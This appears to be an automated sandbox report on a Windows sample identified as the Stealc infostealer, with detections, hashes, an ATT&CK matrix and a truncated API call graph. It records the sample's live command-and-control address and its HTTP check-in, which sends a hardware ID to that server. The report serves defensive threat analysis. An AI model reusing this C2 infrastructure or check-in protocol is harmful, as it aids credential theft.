Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | Create Account (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (13) | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.2067 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpo | file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php3 | file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.2067 | file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1558834
                            Start date and time:2024-11-19 21:01:07 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 15s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 18
                            • Number of non-executed functions: 124
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Cryptbot, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, LummaC Stealer, Stealc | 185.215.113.206/
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | https://online-e.net/st-manager/click/track?id=795&type=raw&url=https://msc-mu.com/apikey-tyudqnhzdgevhdbasx/secure-redirect%23Darth.Vader%2BDeathStar.com&source_url=https%3A%2F%2Fonline-e.net%2Feven-if-even-though%2F&source_title=Even%20if%E3%81%A8Even%20though | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | file.exe | malicious | Amadey | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://brand.site/896562718995127961820892 | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | file.exe | malicious | LummaC | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9HMTAuZHpwdndvYnIucnUvdkd5c2dQdC8= | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | file.exe | malicious | LummaC | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://nam.dcv.ms/WLtyQ3priB | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | http://itrack4.valuecommerce.ne.jp/cgi-bin/2366370/entry.php?vc_url=http://serviceoctopus.com | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | 1.exe | malicious | DBatLoader, TVrat | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://lu-trustt.com/l/security/2024 | malicious | Unknown | 13.107.246.45
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Cryptbot, Stealc, Vidar | 185.215.113.206
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.943391000067245
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'814'528 bytes
                            MD5:d90a0fa7d1b136c6aaa035f6bc5602fa
                            SHA1:1e236ca8b781f344a4738c1810b3c819ec72fac5
                            SHA256:136dfe4a8f2801c7836bb2518b2eb57142e57efb77a665830a00335fdfe0c2bd
                            SHA512:161375c3c6d2abea6d3697fe79832c1928cefd2529e222f444f057ffa282eed8e7780c683a64903f16732022f0629c26826abab4ceacf9b78cbaaaf3d805e67a
                            SSDEEP:49152:toBu4wjPsAgeUE+SERjvwfG1SxNGtvloF:+egJvOGkbKloF
                            TLSH:1C8533115B994625EC084C31685AAFF978CC04940F96EFDDEEC7174676A2BF3ACC0C69
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xa97000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16200 | bcde4c9e6bcae76f8d3cec3a4d8b4aa9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x1ac | 0x200 | bd38996da8dd034899ebe3305f7ca4a8 | False | 0.580078125 | data | 4.55900838675945 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x2a8000 | 0x200 | a4c36d8ee16fbe20c9ba8dce8face6a4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
smsoyiwh | 0x4f4000 | 0x1a2000 | 0x1a1200 | 59cc2be3edc0b8304f678f6031ee6909 | False | 0.9946275893392269 | data | 7.952862175295011 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mwymltiy | 0x696000 | 0x1000 | 0x400 | 4a95e2a0de6370b6e8657d771c96c98f | False | 0.81640625 | data | 6.288569151500908 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x697000 | 0x3000 | 0x2200 | 6782a9e0e8ff5f86ae067150a97eede1 | False | 0.06606158088235294 | DOS executable (COM) | 0.7157932589078735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x694f48 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-19T21:02:10.401141+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2024 21:02:09.444858074 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 19, 2024 21:02:09.449839115 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 19, 2024 21:02:09.449937105 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 19, 2024 21:02:09.450144053 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 19, 2024 21:02:09.454973936 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 19, 2024 21:02:10.159135103 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 19, 2024 21:02:10.159233093 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 19, 2024 21:02:10.175065041 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 19, 2024 21:02:10.180105925 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 19, 2024 21:02:10.401070118 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 19, 2024 21:02:10.401140928 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 19, 2024 21:02:13.669265985 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 19, 2024 21:02:17.333076000 CET | 1.1.1.1 | 192.168.2.5 | 0x4f80 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 19, 2024 21:02:17.333076000 CET | 1.1.1.1 | 192.168.2.5 | 0x4f80 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
                            • 185.215.113.206
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 5940 | C:\Users\user\Desktop\file.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 19, 2024 21:02:09.450144053 CET | 90 | OUT | GET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Nov 19, 2024 21:02:10.159135103 CET | 203 | IN | HTTP/1.1 200 OK
                            Date: Tue, 19 Nov 2024 20:02:10 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Nov 19, 2024 21:02:10.175065041 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJEC
                            Host: 185.215.113.206
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 32 44 31 42 45 38 37 35 41 37 34 31 36 38 38 36 39 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a
                            Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="hwid"112D1BE875A74168869055------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="build"mars------AKJEGCFBGDHJJJJJKJEC--
                            Nov 19, 2024 21:02:10.401070118 CET | 210 | IN | HTTP/1.1 200 OK
                            Date: Tue, 19 Nov 2024 20:02:10 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=



                            Target ID:0
                            Start time:15:02:04
                            Start date:19/11/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x7b0000
                            File size:1'814'528 bytes
                            MD5 hash:D90A0FA7D1B136C6AAA035F6BC5602FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2116004330.0000000005160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:4.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:14.2%
                              Total number of Nodes:1397
                              Total number of Limit Nodes:29
26965 7b4a60 2 API calls 26964->26965 26966 7b474c 26965->26966 26967 7b4a60 2 API calls 26966->26967 26968 7b4765 26967->26968 26969 7b4a60 2 API calls 26968->26969 26970 7b477b 26969->26970 26971 7b4a60 2 API calls 26970->26971 26972 7b4791 26971->26972 26973 7b4a60 2 API calls 26972->26973 26974 7b47a7 26973->26974 26975 7b4a60 2 API calls 26974->26975 26976 7b47bd 26975->26976 26977 7b4a60 2 API calls 26976->26977 26978 7b47d3 26977->26978 26979 7b4a60 2 API calls 26978->26979 26980 7b47ec 26979->26980 26981 7b4a60 2 API calls 26980->26981 26982 7b4802 26981->26982 26983 7b4a60 2 API calls 26982->26983 26984 7b4818 26983->26984 26985 7b4a60 2 API calls 26984->26985 26986 7b482e 26985->26986 26987 7b4a60 2 API calls 26986->26987 26988 7b4844 26987->26988 26989 7b4a60 2 API calls 26988->26989 26990 7b485a 26989->26990 26991 7b4a60 2 API calls 26990->26991 26992 7b4873 26991->26992 26993 7b4a60 2 API calls 26992->26993 26994 7b4889 26993->26994 26995 7b4a60 2 API calls 26994->26995 26996 7b489f 26995->26996 26997 7b4a60 2 API calls 26996->26997 26998 7b48b5 26997->26998 26999 7b4a60 2 API calls 26998->26999 27000 7b48cb 26999->27000 27001 7b4a60 2 API calls 27000->27001 27002 7b48e1 27001->27002 27003 7b4a60 2 API calls 27002->27003 27004 7b48fa 27003->27004 27005 7b4a60 2 API calls 27004->27005 27006 7b4910 27005->27006 27007 7b4a60 2 API calls 27006->27007 27008 7b4926 27007->27008 27009 7b4a60 2 API calls 27008->27009 27010 7b493c 27009->27010 27011 7b4a60 2 API calls 27010->27011 27012 7b4952 27011->27012 27013 7b4a60 2 API calls 27012->27013 27014 7b4968 27013->27014 27015 7b4a60 2 API calls 27014->27015 27016 7b4981 27015->27016 27017 7b4a60 2 API calls 27016->27017 27018 7b4997 27017->27018 27019 7b4a60 2 API calls 27018->27019 27020 7b49ad 27019->27020 27021 7b4a60 2 API calls 27020->27021 27022 7b49c3 27021->27022 27023 7b4a60 2 API calls 27022->27023 27024 7b49d9 27023->27024 27025 7b4a60 2 API calls 27024->27025 27026 7b49ef 27025->27026 27027 7b4a60 2 
API calls 27026->27027 27028 7b4a08 27027->27028 27029 7b4a60 2 API calls 27028->27029 27030 7b4a1e 27029->27030 27031 7b4a60 2 API calls 27030->27031 27032 7b4a34 27031->27032 27033 7b4a60 2 API calls 27032->27033 27034 7b4a4a 27033->27034 27035 7d66e0 27034->27035 27036 7d66ed 43 API calls 27035->27036 27037 7d6afe 8 API calls 27035->27037 27036->27037 27038 7d6c08 27037->27038 27039 7d6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27037->27039 27040 7d6c15 8 API calls 27038->27040 27041 7d6cd2 27038->27041 27039->27038 27040->27041 27042 7d6d4f 27041->27042 27043 7d6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27041->27043 27044 7d6d5c 6 API calls 27042->27044 27045 7d6de9 27042->27045 27043->27042 27044->27045 27046 7d6df6 12 API calls 27045->27046 27047 7d6f10 27045->27047 27046->27047 27048 7d6f8d 27047->27048 27049 7d6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27047->27049 27050 7d6f96 GetProcAddress GetProcAddress 27048->27050 27051 7d6fc1 27048->27051 27049->27048 27050->27051 27052 7d6fca GetProcAddress GetProcAddress 27051->27052 27053 7d6ff5 27051->27053 27052->27053 27054 7d70ed 27053->27054 27055 7d7002 10 API calls 27053->27055 27056 7d70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27054->27056 27057 7d7152 27054->27057 27055->27054 27056->27057 27058 7d716e 27057->27058 27059 7d715b GetProcAddress 27057->27059 27060 7d7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27058->27060 27061 7d051f 27058->27061 27059->27058 27060->27061 27062 7b1530 27061->27062 27371 7b1610 27062->27371 27064 7b153b 27065 7b1555 lstrcpy 27064->27065 27066 7b155d 27064->27066 27065->27066 27067 7b1577 lstrcpy 27066->27067 27068 7b157f 27066->27068 27067->27068 27069 7b1599 lstrcpy 27068->27069 27070 7b15a1 27068->27070 27069->27070 27071 7b1605 27070->27071 27072 7b15fd lstrcpy 27070->27072 27073 7cf1b0 lstrlen 27071->27073 27072->27071 
27074 7cf1e4 27073->27074 27075 7cf1eb lstrcpy 27074->27075 27076 7cf1f7 lstrlen 27074->27076 27075->27076 27077 7cf208 27076->27077 27078 7cf20f lstrcpy 27077->27078 27079 7cf21b lstrlen 27077->27079 27078->27079 27080 7cf22c 27079->27080 27081 7cf233 lstrcpy 27080->27081 27082 7cf23f 27080->27082 27081->27082 27083 7cf258 lstrcpy 27082->27083 27084 7cf264 27082->27084 27083->27084 27085 7cf286 lstrcpy 27084->27085 27086 7cf292 27084->27086 27085->27086 27087 7cf2ba lstrcpy 27086->27087 27088 7cf2c6 27086->27088 27087->27088 27089 7cf2ea lstrcpy 27088->27089 27150 7cf300 27088->27150 27089->27150 27090 7cf30c lstrlen 27090->27150 27091 7cf4b9 lstrcpy 27091->27150 27092 7cf3a1 lstrcpy 27092->27150 27093 7cf3c5 lstrcpy 27093->27150 27094 7cf4e8 lstrcpy 27154 7cf4f0 27094->27154 27095 7b1530 8 API calls 27095->27154 27096 7cee90 28 API calls 27096->27150 27097 7cefb0 35 API calls 27097->27154 27098 7cf479 lstrcpy 27098->27150 27099 7cf59c lstrcpy 27099->27154 27100 7cf616 StrCmpCA 27101 7cf70f StrCmpCA 27100->27101 27100->27154 27105 7cfe8e 27101->27105 27101->27150 27102 7cfa29 StrCmpCA 27111 7cfe2b 27102->27111 27102->27150 27103 7cf73e lstrlen 27103->27150 27104 7cfead lstrlen 27118 7cfec7 27104->27118 27105->27104 27110 7cfea5 lstrcpy 27105->27110 27106 7cfd4d StrCmpCA 27109 7cfd60 Sleep 27106->27109 27115 7cfd75 27106->27115 27107 7cf64a lstrcpy 27107->27154 27108 7cfa58 lstrlen 27108->27150 27109->27150 27110->27104 27112 7cfe4a lstrlen 27111->27112 27113 7cfe42 lstrcpy 27111->27113 27124 7cfe64 27112->27124 27113->27112 27114 7cf89e lstrcpy 27114->27150 27116 7cfd94 lstrlen 27115->27116 27120 7cfd8c lstrcpy 27115->27120 27126 7cfdae 27116->27126 27117 7cf76f lstrcpy 27117->27150 27119 7cfee7 lstrlen 27118->27119 27122 7cfedf lstrcpy 27118->27122 27132 7cff01 27119->27132 27120->27116 27121 7cfbb8 lstrcpy 27121->27150 27122->27119 27123 7cfa89 lstrcpy 27123->27150 27125 7cfdce lstrlen 27124->27125 27127 7cfe7c lstrcpy 27124->27127 27140 7cfde8 27125->27140 
27126->27125 27138 7cfdc6 lstrcpy 27126->27138 27127->27125 27128 7cf791 lstrcpy 27128->27150 27130 7b1530 8 API calls 27130->27150 27131 7cf8cd lstrcpy 27131->27154 27133 7cff21 27132->27133 27134 7cff19 lstrcpy 27132->27134 27135 7b1610 4 API calls 27133->27135 27134->27133 27157 7cfe13 27135->27157 27136 7cfaab lstrcpy 27136->27150 27137 7cf698 lstrcpy 27137->27154 27138->27125 27139 7cfbe7 lstrcpy 27139->27154 27141 7cfe08 27140->27141 27142 7cfe00 lstrcpy 27140->27142 27143 7b1610 4 API calls 27141->27143 27142->27141 27143->27157 27144 7cf7e2 lstrcpy 27144->27150 27145 7cf924 lstrcpy 27145->27154 27146 7cf99e StrCmpCA 27146->27102 27146->27154 27147 7cfafc lstrcpy 27147->27150 27148 7cfc3e lstrcpy 27148->27154 27149 7cfcb8 StrCmpCA 27149->27106 27149->27154 27150->27090 27150->27091 27150->27092 27150->27093 27150->27094 27150->27096 27150->27098 27150->27101 27150->27102 27150->27103 27150->27106 27150->27108 27150->27114 27150->27117 27150->27121 27150->27123 27150->27128 27150->27130 27150->27131 27150->27136 27150->27139 27150->27144 27150->27147 27150->27154 27151 7cf9cb lstrcpy 27151->27154 27152 7cfce9 lstrcpy 27152->27154 27153 7cee90 28 API calls 27153->27154 27154->27095 27154->27097 27154->27099 27154->27100 27154->27102 27154->27106 27154->27107 27154->27137 27154->27145 27154->27146 27154->27148 27154->27149 27154->27150 27154->27151 27154->27152 27154->27153 27155 7cfa19 lstrcpy 27154->27155 27156 7cfd3a lstrcpy 27154->27156 27155->27154 27156->27154 27157->26181 27159 7d278c GetVolumeInformationA 27158->27159 27160 7d2785 27158->27160 27161 7d27ec GetProcessHeap RtlAllocateHeap 27159->27161 27160->27159 27163 7d2826 wsprintfA 27161->27163 27164 7d2822 27161->27164 27163->27164 27381 7d71e0 27164->27381 27168 